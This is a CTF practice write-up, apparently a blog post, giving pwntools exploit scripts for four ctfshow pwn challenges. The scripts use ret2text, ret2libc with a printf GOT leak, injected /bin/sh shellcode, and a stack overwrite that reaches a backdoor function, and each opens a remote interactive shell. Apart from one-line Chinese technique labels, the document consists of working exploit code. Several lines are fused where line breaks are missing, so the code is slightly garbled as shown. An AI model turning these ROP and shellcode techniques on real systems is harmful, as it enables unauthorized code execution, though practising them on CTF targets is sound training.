PWN-PRACTICE-CTFSHOW-8
- 吃瓜杯-wuqian
- 月饼杯II-简单的胖
- 月饼杯II-容易的胖
- 击剑杯-pwn01-My_sword_is_ready
吃瓜杯-wuqian
栈溢出,ret2text
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28059)
elf=ELF("./pwn1")system=elf.plt["system"]
binsh=0x601040
pop_rdi=0x400663
ret=0x400476io.recvuntil("your name? ")
payload="a"*16+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)io.interactive()
月饼杯II-简单的胖
栈溢出,ret2libc
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28091)
elf=ELF("./pwn1")printf_got=elf.got["printf"]
printf_plt=elf.plt["printf"]
pop_rdi=0x400703
pop_rsi_r15=0x400701
ret=0x4004ce
my_format=0x400740
start_addr=0x400510io.recvuntil("your name? ")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(my_format)+p64(pop_rsi_r15)+p64(printf_got)+p64(0)+p64(printf_plt)+p64(start_addr)
io.sendline(payload)
printf_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("printf_addr=="+hex(printf_addr))
libc_base=printf_addr-0x064e80
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9aio.recvuntil("your name? ")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)io.interactive()
月饼杯II-容易的胖
栈溢出,ret2shellcode
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
context.arch="i386"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28076)
elf=ELF("./pwn1")buf=0x0804A040
io.recvuntil("Input your shellcode\n")
payload=p32(buf+4)
payload+=asm(shellcraft.sh())
io.sendline(payload)io.recvuntil("use shellcode????\n")
payload="yes\n".ljust(0x10,"\x00")+p32(buf+4)
io.send(payload)io.interactive()
击剑杯-pwn01-My_sword_is_ready
栈溢出,覆盖栈上数据,使result==666,即可执行后门函数
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28003)
elf=ELF("./pwn1")io.recvuntil("with bit!\n")
payload="a"*36+p32(222)*3
io.send(payload)io.interactive()
)
